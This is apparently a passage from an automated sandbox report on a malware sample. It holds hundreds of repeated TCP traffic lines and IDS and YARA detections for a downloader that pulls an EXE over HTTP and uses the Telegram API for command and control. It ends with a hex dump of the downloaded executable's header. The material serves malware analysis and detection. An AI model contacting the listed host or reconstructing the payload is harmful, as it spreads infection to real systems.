                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.39:80 -> 192.168.2.22:49161
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.39:80 -> 192.168.2.22:49161
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Tue, 19 Nov 2024 17:08:04 GMTContent-Type: application/x-msdos-programContent-Length: 837120Connection: keep-aliveLast-Modified: Tue, 19 Nov 2024 04:32:51 GMTETag: "cc600-6273c86a96582"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 05 12 3c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0c 00 00 22 00 00 00 00 00 00 fe bf 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac bf 0c 00 4f 00 00 00 00 e0 0c 00 e8 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a0 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 1f 00 00 00 e0 0c 00 00 20 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 bf 0c 00 00 00 00 00 48 00 00 00 02 00 